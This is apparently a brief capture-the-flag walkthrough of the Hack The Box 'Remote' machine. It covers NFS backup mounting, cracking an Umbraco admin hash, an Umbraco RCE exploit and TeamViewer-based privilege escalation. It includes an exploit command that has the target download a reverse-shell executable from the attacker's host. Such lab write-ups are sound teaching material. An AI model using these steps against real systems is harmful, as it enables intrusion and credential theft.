Remote

1 minute read

nmap

Port Scanning and general enumeration (Nmap, Umbraco)

nmap -sC -sV -oN nmap/initial -T4 10.10.10.180

nmap

Interesting. FTP, Webserver and maybe some nfs shares we can mount?

Let’s take a look at the site

nmap

Looks like some sort of blog.. ‘Umbraco’?

nmap

nmap

So we’ve found a login form. Nice. Default creds didn’t work, so we’ll come back to this.

Let’s see if there’s anything to mount

nmap

Interesting! Let’s mount it

sudo mount -t nfs 10.10.10.180:/site_backups /path/to/where/you/want/to/save/it

Full site backup!

Since we know the backend is Umbraco, we can find the version in the Web.config file and credentials in the App_Data/Umbraco.sdf file.

Version:

nmap

To get the credentials we can run strings on the Umbraco.sdf file, redirect it to a file and run head on that file

nmap

So the admin password is a SHA1 hash. Let’s crack it and log in using Admin@htb.local:cracked-password in the forms we found earlier.


Access (Umbraco RCE, msfvenom)

So now that we’re authenticated we have a little more room to play with things. I found this Umbraco RCE script that should be perfect

nmap

Nice! So now we have remote code execution. Let’s get a proper shell

nmap

Stand up a simple python http server and use the exploit to transfer our executable to the machine

python3 exploit.py -u admin@htb.local -p password -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command Invoke-WebRequest -Uri http://10.10.14.22:8000/rev.exe -OutFile C:/Users/Public/rev.exe

Now that our shell is on the box, let’s fire up a metasploit listener

nmap

Trigger the shell and off we go


Privesc (winPEAS, evil-winrm)

Now that we’re on the box, let’s do some enumeration. I like winPEAS

Upload and run it

nmap

nmap

Interesting. Teamviewer7 also has a metasploit module. Let’s see what that has for us

Background your meterpreter session and

nmap

nmap

Could that be the Admin password? Let’s check using evil-winrm

nmap

nmap

nmap